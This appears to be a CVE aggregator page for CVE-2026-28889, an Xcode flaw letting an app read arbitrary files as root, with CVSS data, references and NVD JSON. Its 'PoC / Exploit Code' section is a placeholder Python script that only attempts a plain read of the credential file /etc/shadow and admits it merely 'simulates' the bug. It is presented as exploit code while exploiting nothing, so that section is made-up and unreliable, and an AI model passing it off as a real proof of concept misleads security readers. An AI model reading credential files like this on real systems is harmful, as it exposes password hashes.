CVE-2026-28889

Description

A permissions issue was addressed with additional restrictions. This issue is fixed in Xcode 26.4. An app may be able to read arbitrary files as root.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:* - VULNERABLE

Apple Xcode < 26.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-28889: Arbitrary File Read as Root in Xcode
# This script simulates the vulnerability behavior.

import os

def exploit():
    # Target a sensitive file that normally requires root access
    target_path = "/etc/shadow"
    
    print(f"[*] Attempting to read {target_path}...")
    
    try:
        # Simulate the permission bypass vulnerability
        # In the real scenario, the app would have root read access due to the bug
        with open(target_path, 'r') as file:
            content = file.read()
            print("[+] Success! File content read (partial):")
            print(content[:100])
    except PermissionError:
        print("[-] Failed: Permission denied.")
    except FileNotFoundError:
        print("[-] Failed: File not found on this system.")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28889
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28889
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28889/
[4] VulDB https://vuldb.com/cve/CVE-2026-28889
[5] https://support.apple.com/en-us/126801

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28889", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:12.380", "lastModified": "2026-03-26T18:24:45.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A permissions issue was addressed with additional restrictions. This issue is fixed in Xcode 26.4. An app may be able to read arbitrary files as root."}, {"lang": "es", "value": "Se abordó un problema de permisos con restricciones adicionales. Este problema se corrigió en Xcode 26.4. Una aplicación podría leer archivos arbitrarios como root."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "2F87BC4C-B08E-4A05-86E2-1CD228838DEA"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126801", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}